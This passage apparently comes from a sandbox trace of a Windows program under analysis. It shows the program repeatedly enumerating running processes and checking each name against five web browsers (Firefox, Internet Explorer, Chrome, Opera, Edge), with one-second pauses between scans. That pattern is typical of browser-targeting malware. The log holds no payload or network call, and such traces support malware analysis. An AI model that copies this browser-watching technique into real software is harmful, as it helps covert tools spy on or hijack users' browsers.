(lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0250.723] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0250.723] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0250.723] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.723] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0250.723] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0250.723] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0250.723] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0250.723] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0250.723] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.723] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0250.724] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0250.724] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0250.724] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0250.724] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0250.724] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.724] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0250.724] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0250.724] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0250.724] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0250.724] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0250.725] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.725] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0250.725] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0250.725] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0250.725] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0250.725] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0250.725] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.725] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0250.726] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0250.726] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0250.726] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0250.726] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0250.726] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.726] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0250.726] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0250.726] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0250.726] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0250.726] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0250.726] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.726] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0250.727] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0250.727] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0250.727] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0250.727] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0250.727] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.727] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0250.727] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0250.727] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0250.727] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0250.728] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0250.728] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.728] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0250.728] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0250.728] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0250.728] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0250.728] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0250.728] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.728] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0250.729] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0250.729] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0250.729] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0250.729] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0250.729] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.729] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0250.729] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0250.729] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0250.729] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0250.729] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0250.729] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.729] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.730] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0250.730] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0250.730] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0250.730] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0250.730] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.730] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0250.730] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0250.730] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0250.730] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0250.731] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0250.731] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.731] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.731] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0250.731] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0250.731] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0250.731] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0250.731] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.731] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0250.732] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0250.732] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0250.732] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0250.732] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0250.732] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.732] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0250.732] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0250.732] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0250.732] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0250.732] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0250.732] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.732] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0250.733] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0250.733] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0250.733] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0250.733] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0250.733] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.733] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0250.733] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0250.733] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0250.733] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0250.734] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0250.734] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.734] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0250.734] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0250.734] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0250.734] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0250.734] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0250.734] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.734] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0250.735] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0250.735] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0250.735] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0250.735] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0250.735] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.735] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0250.735] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0250.735] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0250.735] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0250.735] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0250.735] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.735] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0250.736] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0250.736] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0250.736] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0250.736] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0250.736] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.736] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0250.736] CloseHandle (hObject=0xe8) returned 1 [0250.737] Sleep (dwMilliseconds=0x3e8) [0251.770] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0251.772] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.772] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0251.772] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0251.772] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0251.772] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0251.772] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0251.772] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0251.773] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0251.773] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0251.773] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0251.773] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0251.773] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0251.773] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0251.773] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0251.773] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0251.773] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0251.773] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0251.773] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.773] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0251.774] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0251.774] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0251.774] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0251.774] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0251.774] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.774] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0251.775] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0251.775] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0251.775] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0251.775] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0251.775] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.775] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0251.775] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0251.775] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0251.775] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0251.775] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0251.775] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.775] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0251.776] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0251.776] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0251.776] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0251.776] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0251.776] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.776] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0251.776] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0251.776] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0251.776] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0251.776] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0251.776] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.776] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0251.777] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0251.777] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0251.777] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0251.777] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0251.777] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.777] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0251.778] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0251.778] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0251.778] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0251.778] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0251.778] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.778] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.778] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0251.778] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0251.778] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0251.778] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0251.778] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.779] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.779] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0251.779] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0251.779] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0251.779] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0251.779] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.779] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.780] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0251.780] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0251.780] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0251.780] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0251.780] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.780] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.780] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0251.780] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0251.780] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0251.780] lstrcmpiA 